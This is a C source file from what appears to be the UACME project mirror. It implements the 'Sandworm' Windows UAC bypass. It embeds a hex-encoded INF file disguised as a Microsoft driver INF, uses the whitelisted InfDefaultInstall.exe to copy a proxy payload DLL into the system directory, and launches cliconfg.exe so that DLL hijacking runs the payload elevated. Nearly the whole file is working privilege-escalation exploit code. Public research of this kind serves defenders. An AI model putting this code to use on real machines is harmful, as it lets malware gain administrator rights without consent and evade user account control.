mirror of https://github.com/hfiref0x/UACME.git
139 lines
5.1 KiB
C
139 lines
5.1 KiB
C
/*******************************************************************************
|
|
*
|
|
* (C) COPYRIGHT AUTHORS, 2017
|
|
*
|
|
* TITLE: SANDWORM.C
|
|
*
|
|
* VERSION: 2.70
|
|
*
|
|
* DATE: 25 Mar 2017
|
|
*
|
|
* Sandworm method.
|
|
*
|
|
* Used as part of exploit which is linked with rumored "russian hackers".
|
|
* - Âû ãîâîðèòå ïî-ðóññêè?
|
|
* - Yes I can!
|
|
*
|
|
* Originally it was on list to include in first UACMe releases but was considered
|
|
* way too out-date and unavailable under something else than Windows 7 + Windows 8.
|
|
* However since Vault7 release this method again poped up in mind, thanks to CIA.
|
|
*
|
|
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
|
|
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
|
|
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
|
|
* PARTICULAR PURPOSE.
|
|
*
|
|
*******************************************************************************/
|
|
#include "global.h"
|
|
|
|
/*
|
|
g_SandwormInf
|
|
|
|
; 61883.INF
|
|
; Copyright (c) Microsoft Corporation. All rights reserved.
|
|
|
|
[Version]
|
|
Signature="$CHICAGO$"
|
|
Class=61883
|
|
ClassGuid={7EBEFBC0-3200-11D2-B4C2-00A0C9697D07}
|
|
Provider=%Msft%
|
|
DriverVer=16/21/2006,6.1.7600.16385
|
|
|
|
[DestinationDirs]
|
|
DefaultDestDir = 11
|
|
|
|
[DefaultInstall]
|
|
CopyFiles=@ntwdblib.dll
|
|
*/
|
|
|
|
static const unsigned char g_SandwormInf[319] = {
|
|
0x3B, 0x20, 0x36, 0x31, 0x38, 0x38, 0x33, 0x2E, 0x49, 0x4E, 0x46, 0x0D, 0x0A, 0x3B, 0x20, 0x43,
|
|
0x6F, 0x70, 0x79, 0x72, 0x69, 0x67, 0x68, 0x74, 0x20, 0x28, 0x63, 0x29, 0x20, 0x4D, 0x69, 0x63,
|
|
0x72, 0x6F, 0x73, 0x6F, 0x66, 0x74, 0x20, 0x43, 0x6F, 0x72, 0x70, 0x6F, 0x72, 0x61, 0x74, 0x69,
|
|
0x6F, 0x6E, 0x2E, 0x20, 0x20, 0x41, 0x6C, 0x6C, 0x20, 0x72, 0x69, 0x67, 0x68, 0x74, 0x73, 0x20,
|
|
0x72, 0x65, 0x73, 0x65, 0x72, 0x76, 0x65, 0x64, 0x2E, 0x0D, 0x0A, 0x0D, 0x0A, 0x5B, 0x56, 0x65,
|
|
0x72, 0x73, 0x69, 0x6F, 0x6E, 0x5D, 0x0D, 0x0A, 0x53, 0x69, 0x67, 0x6E, 0x61, 0x74, 0x75, 0x72,
|
|
0x65, 0x3D, 0x22, 0x24, 0x43, 0x48, 0x49, 0x43, 0x41, 0x47, 0x4F, 0x24, 0x22, 0x0D, 0x0A, 0x43,
|
|
0x6C, 0x61, 0x73, 0x73, 0x3D, 0x36, 0x31, 0x38, 0x38, 0x33, 0x0D, 0x0A, 0x43, 0x6C, 0x61, 0x73,
|
|
0x73, 0x47, 0x75, 0x69, 0x64, 0x3D, 0x7B, 0x37, 0x45, 0x42, 0x45, 0x46, 0x42, 0x43, 0x30, 0x2D,
|
|
0x33, 0x32, 0x30, 0x30, 0x2D, 0x31, 0x31, 0x44, 0x32, 0x2D, 0x42, 0x34, 0x43, 0x32, 0x2D, 0x30,
|
|
0x30, 0x41, 0x30, 0x43, 0x39, 0x36, 0x39, 0x37, 0x44, 0x30, 0x37, 0x7D, 0x0D, 0x0A, 0x50, 0x72,
|
|
0x6F, 0x76, 0x69, 0x64, 0x65, 0x72, 0x3D, 0x25, 0x4D, 0x73, 0x66, 0x74, 0x25, 0x0D, 0x0A, 0x44,
|
|
0x72, 0x69, 0x76, 0x65, 0x72, 0x56, 0x65, 0x72, 0x3D, 0x31, 0x36, 0x2F, 0x32, 0x31, 0x2F, 0x32,
|
|
0x30, 0x30, 0x36, 0x2C, 0x36, 0x2E, 0x31, 0x2E, 0x37, 0x36, 0x30, 0x30, 0x2E, 0x31, 0x36, 0x33,
|
|
0x38, 0x35, 0x0D, 0x0A, 0x0D, 0x0A, 0x5B, 0x44, 0x65, 0x73, 0x74, 0x69, 0x6E, 0x61, 0x74, 0x69,
|
|
0x6F, 0x6E, 0x44, 0x69, 0x72, 0x73, 0x5D, 0x0D, 0x0A, 0x44, 0x65, 0x66, 0x61, 0x75, 0x6C, 0x74,
|
|
0x44, 0x65, 0x73, 0x74, 0x44, 0x69, 0x72, 0x20, 0x3D, 0x20, 0x31, 0x31, 0x0D, 0x0A, 0x0D, 0x0A,
|
|
0x5B, 0x44, 0x65, 0x66, 0x61, 0x75, 0x6C, 0x74, 0x49, 0x6E, 0x73, 0x74, 0x61, 0x6C, 0x6C, 0x5D,
|
|
0x0D, 0x0A, 0x43, 0x6F, 0x70, 0x79, 0x46, 0x69, 0x6C, 0x65, 0x73, 0x3D, 0x40, 0x6E, 0x74, 0x77,
|
|
0x64, 0x62, 0x6C, 0x69, 0x62, 0x2E, 0x64, 0x6C, 0x6C, 0x0D, 0x0A, 0x0D, 0x0A, 0x0D, 0x0A
|
|
};
|
|
|
|
|
|
/*
|
|
* ucmSandwormMethod
|
|
*
|
|
* Purpose:
|
|
*
|
|
* Bypass UAC by using whitelisted InfDefaultInstall executable.
|
|
* Originally Sandworm used InfDefaultInstall to write to the HKLM.
|
|
* We will use it for dll hijack.
|
|
* Target application in our case will be cliconfg.exe
|
|
*
|
|
*/
|
|
BOOL ucmSandwormMethod(
|
|
_In_ PVOID ProxyDll,
|
|
_In_ DWORD ProxyDllSize
|
|
)
|
|
{
|
|
BOOL bResult = FALSE;
|
|
WCHAR szPayloadDll[MAX_PATH * 2];
|
|
WCHAR szInstallInf[MAX_PATH * 2];
|
|
WCHAR szProcessBuf[MAX_PATH * 2];
|
|
|
|
RtlSecureZeroMemory(szPayloadDll, sizeof(szPayloadDll));
|
|
RtlSecureZeroMemory(szInstallInf, sizeof(szInstallInf));
|
|
|
|
//
|
|
// Write proxy dll to the disk.
|
|
//
|
|
_strcpy(szPayloadDll, g_ctx.szTempDirectory);
|
|
_strcat(szPayloadDll, NTWDBLIB_DLL);
|
|
if (supWriteBufferToFile(szPayloadDll, ProxyDll, ProxyDllSize)) {
|
|
|
|
//
|
|
// Write installation inf to the disk.
|
|
//
|
|
_strcpy(szInstallInf, g_ctx.szTempDirectory);
|
|
_strcat(szInstallInf, PACKAGE_INF);
|
|
if (supWriteBufferToFile(szInstallInf, (PVOID)g_SandwormInf, sizeof(g_SandwormInf))) {
|
|
|
|
//
|
|
// Run infdefaultinstall.exe to copy our payload dll.
|
|
//
|
|
RtlSecureZeroMemory(&szProcessBuf, sizeof(szProcessBuf));
|
|
_strcpy(szProcessBuf, g_ctx.szSystemDirectory);
|
|
_strcat(szProcessBuf, INFDEFAULTINSTALL_EXE);
|
|
if (supRunProcess(szProcessBuf, szInstallInf)) {
|
|
|
|
//
|
|
// Run target executable.
|
|
//
|
|
RtlSecureZeroMemory(&szProcessBuf, sizeof(szProcessBuf));
|
|
_strcpy(szProcessBuf, g_ctx.szSystemDirectory);
|
|
_strcat(szProcessBuf, CLICONFG_EXE);
|
|
bResult = supRunProcess(szProcessBuf, NULL);
|
|
}
|
|
}
|
|
}
|
|
|
|
if (szInstallInf[0] != 0) {
|
|
DeleteFile(szInstallInf);
|
|
}
|
|
if (szPayloadDll[0] != 0) {
|
|
DeleteFile(szPayloadDll);
|
|
}
|
|
|
|
return bResult;
|
|
}
|